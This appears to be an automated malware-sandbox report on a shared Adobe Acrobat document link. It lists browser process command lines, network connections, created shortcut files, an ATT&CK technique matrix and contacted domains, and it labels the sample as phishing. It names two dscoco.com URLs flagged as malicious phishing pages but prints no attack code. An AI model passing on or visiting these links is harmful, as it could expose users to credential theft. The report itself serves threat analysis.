Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56924
Source: unknown	Network traffic detected: HTTP traffic on port 56951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57103
Source: unknown	Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 57118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56935
Source: unknown	Network traffic detected: HTTP traffic on port 57086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57113
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56947
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56943
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57119
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57004
Source: unknown	Network traffic detected: HTTP traffic on port 56950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57120
Source: unknown	Network traffic detected: HTTP traffic on port 57041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57093
Source: unknown	Network traffic detected: HTTP traffic on port 57075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57091
Source: unknown	Network traffic detected: HTTP traffic on port 57058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49674
Source: unknown	Network traffic detected: HTTP traffic on port 57087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57049
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56997
Source: unknown	Network traffic detected: HTTP traffic on port 57071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57058
Source: unknown	Network traffic detected: HTTP traffic on port 57094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 57039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown	Network traffic detected: HTTP traffic on port 57004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57051
Source: unknown	Network traffic detected: HTTP traffic on port 56948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57065
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 57038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57074
Source: unknown	Network traffic detected: HTTP traffic on port 57050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57073
Source: unknown	Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57085
Source: unknown	Network traffic detected: HTTP traffic on port 57049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 57072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57083
Source: unknown	Network traffic detected: HTTP traffic on port 56859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57084
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57080

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:56931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:56934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:56949 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.win@86/366@78/658

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\4352bfac-6404-4750-bd7a-191f74bc7a91.tmp

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1920,i,8986662777520531306,16953226283014811708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1920,i,8986662777520531306,16953226283014811708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6360 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6740 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6360 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6740 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7448 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7448 --field-trial-handle=2044,i,12696474982670903762,12821396085405586085,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: Chrome Cache Entry: 888

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Drive-by Compromise	Windows Management Instrumentation	1 Scripting	1 Process Injection	11 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Source	Detection	Scanner	Label	Link
https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label	Link
about:blank	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dd20fzx9mj46f.cloudfront.net	13.224.189.18	true	false	unknown
chrome.cloudflare-dns.com	162.159.61.3	true	false	unknown
privacycollector-production-457481513.us-east-1.elb.amazonaws.com	54.86.219.109	true	false	unknown
widget.uservoice.com	104.17.30.92	true	false	unknown
api.echosign.com	3.236.206.93	true	false	unknown
plus.l.google.com	172.217.23.110	true	false	unknown
detect.adobedccdn.com	127.0.0.1	true	false	unknown
cdn-sharing.adobecc.map.fastly.net	151.101.129.138	true	false	unknown
sni1gl.wpc.nucdn.net	152.199.21.175	true	false	unknown
adobetarget.data.adobedc.net	66.235.152.225	true	false	unknown
play.google.com	172.217.16.142	true	false	unknown
o4505393339695104.ingest.us.sentry.io	34.120.195.249	true	false	unknown
adobe.com.ssl.d1.sc.omtrdc.net	63.140.62.27	true	false	unknown
sb.scorecardresearch.com	18.239.83.98	true	false	unknown
www.google.com	142.250.185.228	true	false	unknown
by2.uservoice.com	104.17.30.92	true	false	unknown
prod.adobeccstatic.com	3.165.190.7	true	false	unknown
googlehosted.l.googleusercontent.com	142.250.185.225	true	false	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	unknown
c.evidon.com	unknown	unknown	false	unknown
ims-na1.adobelogin.com	unknown	unknown	false	unknown
c.msn.com	unknown	unknown	false	unknown
dc-api-v2.adobecontent.io	unknown	unknown	false	unknown
ntp.msn.com	unknown	unknown	false	unknown
clients2.googleusercontent.com	unknown	unknown	false	unknown
adobe.tt.omtrdc.net	unknown	unknown	false	unknown
cdn-sharing.adobecc.com	unknown	unknown	false	unknown
static.adobelogin.com	unknown	unknown	false	unknown
_49100._https.detect.adobedccdn.com	unknown	unknown	false	unknown
use.typekit.net	unknown	unknown	false	unknown
assets.msn.com	unknown	unknown	false	unknown
assets.adobedtm.com	unknown	unknown	false	unknown
_39691._https.detect.adobedccdn.com	unknown	unknown	false	unknown
l.betrad.com	unknown	unknown	false	unknown
bzib.nelreports.net	unknown	unknown	false	unknown
p.typekit.net	unknown	unknown	false	unknown
_19292._https.detect.adobedccdn.com	unknown	unknown	false	unknown
dc-api.adobecontent.io	unknown	unknown	false	unknown
files-download2.acrocomcontent.com	unknown	unknown	false	unknown
apis.google.com	unknown	unknown	false	unknown
api.msn.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dscoco.com/findattacheddocument/secure.html#	true		unknown
about:blank	false	Avira URL Cloud: safe	unknown
https://dscoco.com/findattacheddocument/secure.html	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
2.18.64.222	unknown	European Union	6057	AdministracionNacionaldeTelecomunicacionesUY	false
51.137.3.145	unknown	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.224.189.18	dd20fzx9mj46f.cloudfront.net	United States	16509	AMAZON-02US	false
2.19.126.209	unknown	European Union	16625	AKAMAI-ASUS	false
2.19.126.69	unknown	European Union	16625	AKAMAI-ASUS	false
2.19.126.206	unknown	European Union	16625	AKAMAI-ASUS	false
34.246.54.182	unknown	United States	16509	AMAZON-02US	false
3.233.129.217	unknown	United States	14618	AMAZON-AESUS	false
142.250.185.227	unknown	United States	15169	GOOGLEUS	false
18.238.49.74	unknown	United States	16509	AMAZON-02US	false
104.21.27.63	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.185.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
66.235.152.225	adobetarget.data.adobedc.net	United States	15224	OMNITUREUS	false
20.114.189.70	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
45.143.99.52	unknown	Turkey	208485	EKSENBILISIMTR	false
23.200.0.9	unknown	United States	20940	AKAMAI-ASN1EU	false
204.79.197.239	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
157.240.241.1	unknown	United States	32934	FACEBOOKUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
